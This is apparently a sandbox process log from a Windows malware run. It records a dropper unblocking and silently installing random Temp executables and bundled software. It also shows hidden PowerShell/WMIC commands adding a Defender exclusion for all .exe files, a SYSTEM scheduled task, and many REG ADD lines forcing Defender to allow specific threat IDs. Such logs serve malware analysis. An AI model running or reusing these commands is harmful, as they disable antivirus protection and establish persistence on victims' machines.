C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1936

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1888

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1828

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2152

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"

C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe

C:\Users\Admin\AppData\Local\Temp\i6WlEJZD\uljaByY.exe /sid=3 /pid=224

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2256

C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe

C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2248

C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DF6FB.tmp\BvDOO.tmp" /SL5="$40710,5432480,721408,C:\Users\Admin\AppData\Local\Temp\J4HakZ4P\BvDOO.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2232

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause player_blu_ray_11143

C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe

"C:\Users\Admin\AppData\Local\Player Blu Ray 3.1.33\brplayer364.exe" -i

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2404 -ip 2404

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause player_blu_ray_11143

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2248

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1456

C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe

C:\Users\Admin\AppData\Local\Temp\iWFDRZwW\aj2SLnyk2Y2Ml.exe --silent --allusers=0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2268

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --silent --allusers=0 --server-tracking-blob=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

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2300

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x70318c5c,0x70318c68,0x70318c74

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\setup.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --vought_browser=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera GX" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=0 --run-at-startup=1 --server-tracking-data=server_tracking_data --initial-pid=2684 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_20241115035520" --session-guid=aa2003d6-e906-4b9e-ae4d-56e7addc7336 --server-tracking-blob=YjZkOWQwMWM1ZGMyMWFkYWUyOTg1MGJlYzk0M2UzNTE0NTFiNmY4MDc2NjgzMzRkOWQ4YWY5YjEzZjg3Zjk2MDp7ImNvdW50cnkiOiJHQiIsImVkaXRpb24iOiJzdGQtMiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFHWFNldHVwLmV4ZSIsInByb2R1Y3QiOnsibmFtZSI6Im9wZXJhX2d4In0sInF1ZXJ5IjoiL29wZXJhX2d4L3N0YWJsZS9lZGl0aW9uL3N0ZC0yLz91dG1fc291cmNlPU9GVCZ1dG1fbWVkaXVtPXBiJnV0bV9jYW1wYWlnbj1vZ3gmJnV0bV9jb250ZW50PTM1MzE4Iiwic3lzdGVtIjp7InBsYXRmb3JtIjp7ImFyY2giOiJ4ODZfNjQiLCJvcHN5cyI6IldpbmRvd3MiLCJvcHN5cy12ZXJzaW9uIjoiMTEiLCJwYWNrYWdlIjoiRVhFIn19LCJ0aW1lc3RhbXAiOiIxNzMxNjQyOTE0LjI0ODAiLCJ1c2VyYWdlbnQiOiJNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvMTE4LjAuMC4wIFNhZmFyaS81MzcuMzYiLCJ1dG0iOnsiY2FtcGFpZ24iOiJvZ3giLCJjb250ZW50IjoiMzUzMTgiLCJtZWRpdW0iOiJwYiIsInNvdXJjZSI6Ik9GVCJ9LCJ1dWlkIjoiNDBlODYwNGQtYTQ0MC00OGRlLWIxM2YtNjQ5NTMyYWUxNmIyIn0= --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=DC05000000000000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2288

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS4462859E\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=114.0.5282.202 --initial-client-data=0x338,0x33c,0x340,0x308,0x344,0x6f6d8c5c,0x6f6d8c68,0x6f6d8c74

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2008

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2004

C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe

"C:\Users\Admin\AppData\Roaming\uTorrent\uTorrent.exe" "C:\Users\Admin\Documents\the-longing-codex.torrent" /SHELLASSOC

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\Opera_GX_assistant_73.0.3856.382_Setup.exe_sfx.exe"

C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe

C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe /VERYSILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404

C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp

"C:\Users\Admin\AppData\Local\Temp\is-3M3MK.tmp\IFVII4XGy4B4o.tmp" /SL5="$304D6,2448307,138752,C:\Users\Admin\AppData\Local\Temp\pNRn8PJQ\IFVII4XGy4B4o.exe" /VERYSILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2364

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera GX Installer Temp\opera_package_202411150355201\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera GX Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktopGX --annotation=ver=73.0.3856.382 --initial-client-data=0x2a4,0x2a8,0x2ac,0x280,0x2b0,0xdb4f48,0xdb4f58,0xdb4f64

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 2220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe"

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe /did=757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 1992

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bhzAbyJhiYArNEwhRY" /SC once /ST 03:56:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe\" Y8 /pjudidxH 757674 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe

C:\Users\Admin\AppData\Local\Temp\oKIyrUJE\ZG2ecJn9.exe Y8 /pjudidxH 757674 /S

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147914824\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

